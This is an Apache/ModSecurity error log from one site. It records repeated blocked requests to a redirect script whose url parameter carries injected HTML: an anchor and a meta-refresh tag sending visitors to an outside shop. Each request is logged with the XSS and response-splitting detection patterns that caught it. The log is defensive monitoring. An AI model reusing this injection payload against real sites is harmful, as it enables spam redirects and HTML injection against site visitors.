content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:10.978950 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:10.979711 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:27.290451 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:27.292169 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:27.292354 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:27.292460 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:27.292643 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:27.293091 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:27.293402 2026] [security2:error] [pid 1511173:tid 1511189] [client 27.78.84.116:61941] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaZ_jVc-A-CSptvm1hXQAAAE0"]
[Mon May 11 20:05:43.626001 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:43.629281 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:43.631437 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:43.633797 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:43.636599 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:43.637038 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:43.637737 2026] [security2:error] [pid 1501831:tid 1501834] [client 27.78.84.116:62813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIad1NddpkriGUb6ZVmFgAAAQE"]
[Mon May 11 20:05:44.442939 2026] [ssl:error] [pid 1516058:tid 1516098] (EAI 2)Name or service not known: [client 74.7.175.189:35802] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 20:05:44.443013 2026] [ssl:error] [pid 1516058:tid 1516098] AH01941: stapling_renew_response: responder error
[Mon May 11 20:05:54.261992 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:05:54.266326 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:05:54.273650 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:05:54.275474 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:05:54.280289 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:05:54.280931 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:05:54.281839 2026] [security2:error] [pid 1502013:tid 1502031] [client 27.78.84.116:63609] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIagpYn-x0CHsbEbP2b3QAAAIE"]
[Mon May 11 20:06:05.913508 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri 